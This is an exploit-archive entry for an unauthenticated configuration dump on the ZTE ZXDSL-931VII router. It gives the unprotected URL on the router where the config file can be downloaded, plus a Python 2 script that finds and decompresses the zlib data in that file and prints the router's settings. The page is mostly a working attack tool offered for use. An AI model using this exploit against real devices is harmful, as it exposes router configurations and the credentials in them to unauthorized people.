ZTE ZXDSL-931VII Unauthenticated Configuration Dump

#!/usr/bin/env python
import zlib
#scripte originated from http://reverseengineering.stackexchange.com/questions/3593/re-compressed-backup-file-router-linux-based-so-is-it-compresed-with-zlib
print "################################################"
print "#   THe W0lf is so  close                      #"
print "# ZTE 931Vii Router configuration unpacker     #"
print "#   Find configuration file @                  #"
print "#  http://192.168.1.1/manager_dev_config_t.gch #"
print "#  L0ukanik0s 2014 Hack-Hosting                #"
print "#[email protected]                        #"
print "################################################"
 
print "Enter your config.bin path: e.g [email protected]:~#/Desktop/931router_config.bin"
configfile = raw_input("File Path :").strip()

magic_numbers = ['\x78\xDA'] 
filename = configfile


infile = open(filename, 'r') 
data = infile.read()


pos = 0 
found = False


while pos < len(data): 
	window = data[pos:pos+2] 
	for marker in magic_numbers: 
		if window == marker: 
			found = True 
			start = pos 
			print "Start of zlib %s" % pos 
			rest_of_data = data[start:] 
			decomp_obj = zlib.decompressobj() 
			uncompressed_msg = decomp_obj.decompress(rest_of_data) 			
			print "Configuration of ZTE 931 File Content: %s" % uncompressed_msg 
			break 
	if pos == len(data): 
		break 
	pos += 1


if found: 
	header = data[:start] 
	footer = decomp_obj.unused_data


if not found: 
	print "Sorry, no zlib found." 

#http://reverseengineering.stackexchange.com/questions/3593/re-compressed-backup-file-router-linux-based-so-is-it-compresed-with-zlib

#  0day.today [2018-03-09]  #